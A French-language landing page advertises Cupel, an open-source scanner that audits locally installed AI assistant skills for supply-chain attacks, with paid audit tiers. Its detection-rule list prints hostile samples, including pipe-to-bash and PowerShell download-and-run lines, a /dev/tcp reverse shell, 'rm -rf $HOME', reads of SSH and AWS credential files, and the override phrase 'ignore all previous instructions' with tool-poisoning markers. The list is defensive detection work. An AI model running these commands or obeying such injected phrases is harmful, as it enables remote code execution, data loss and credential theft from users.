Aller au contenu principal

aissabelkoussa.com est un domaine de phishing, assurez-vous d'être sur aissabelkoussa.fr

AÏSSA BELKOUSSA

Outil open-source · MIT · zero network

Sépare le métal pur
des impuretés.

Cupel audite localement les skills IA installés sur ta machine — Claude Code, Cursor, Codex, Windsurf, Gemini, Continue. Il détecte les prompt injections, l'exfiltration de credentials, les reverse shells et 8 autres signaux d'attaque supply-chain.

Le nom est emprunté à la coupelle, l'instrument de l'essayeur d'or depuis 4000 ans : on y dépose l'échantillon, on chauffe, les impuretés sont absorbées, le métal pur reste.

$
npx @aissabelkoussa/cupel
○ 12 sûrs ◐ 4 à vérifier ● 2 risque
● skill-productivity score 75
· cred_file_read (+40)
· webhook_exfil (+30)

Comment ça marche

01

Tu lances

Une seule commande dans ton terminal, depuis n'importe quel dossier de projet ou ton home directory.

npx @aissabelkoussa/cupel
02

Cupel chauffe

Le scanner parcourt tes installations Claude Code, Cursor, Codex, Windsurf, Gemini, Continue. 11 règles de détection, scoring composite, zero network.

03

Les impuretés ressortent

Tu obtiens un tableau coloré : tier ok / warn / danger, avec pour chaque skill suspect la ligne de code exacte qui pose problème. Tu décides ce que tu désinstalles.

Ce que cupel détecte

14 catégories de signaux, scoring composite

shell_pipe_to_interpreter
curl https://x.io/y.sh | bash
reverse_shell_tcp
/dev/tcp/10.0.0.1/4444
rm_rf_root
rm -rf $HOME
prompt_injection
« ignore all previous instructions » (FR + EN)
cred_file_read
cat ~/.ssh/id_rsa, ~/.aws/credentials
credential_pattern
clés AWS / Stripe / OpenAI en clair
webhook_exfil
webhook.site, ngrok, requestbin
powershell_iwr_iex
iwr https://x | iex
eval_dynamic
eval(atob(...))
invisible_unicode
zero-width chars, RTL override (ASCII smuggling)
tool_poisoning_directive
<!-- SYSTEM: ... -->, IMPORTANT FOR ASSISTANT
hex_escape_chain
\xNN\xNN…, String.fromCharCode(N,N,N…)
no_manifest
absence de SKILL.md / manifest.json
unsigned
aucune signature ed25519
stale
dernière modif > 365 jours

Les installeurs trusted (rustup, nodejs.org, homebrew) sont reconnus et leur poids divisé par 2 — pas de faux positif sur les setups légitimes.

Tarifs

Le CLI est libre. L'humain qui auditera ton stack a un prix.

CLI gratuit

0 €

Scan illimité, sur ta machine

  • npx @aissabelkoussa/cupel — zéro install, zéro compte
  • Scan ~/.claude/, ~/.cursor/, ~/.codex/, …
  • Sortie JSON + SARIF pour CI / pipelines
  • Code MIT auditable
Voir sur GitHub ›
3 audits livrés par semaine

Audit async

590 €

1 freelance ou indépendant

  • Rapport PDF 12-18 pages avec recommandations actionnables
  • Politique CI prête à coller dans ton .github/workflows/
  • 30 min Loom commenté de la relecture humaine
  • Livraison sous 5 jours ouvrés — pas de calendrier à caler
  • 7 jours de support email post-audit
Réserver — paiement immédiat ›

Audit équipe

1 490 €

Jusqu'à 10 devs

  • Audit complet des skills déployés en équipe
  • Politique de validation des skills (process écrit)
  • Formation 2 h des leads sur les risques détectés
  • Rapport pour CTO / Head of Security
  • 30 jours de support email
Discuter d'un audit équipe ›

Cupel Org

à partir de 4 900 €

Org 30+ devs, SLA, sessions trimestrielles

  • Audit complet multi-équipes
  • Politique CI custom + intégration outillage interne
  • 2 sessions de revue trimestrielles
  • SLA réponse 24 h sur incident sécurité
  • Accès direct par message privé
Parler à Aïssa ›

Trente secondes pour scanner ton workspace.

Tape la commande, lis le rapport, désinstalle ce qui doit l'être. Si tu veux qu'on regarde ensemble, je prends deux audits par mois.

npx @aissabelkoussa/cupel
Site du projet ›Code source MIT ›Réserver l'audit 590 € ›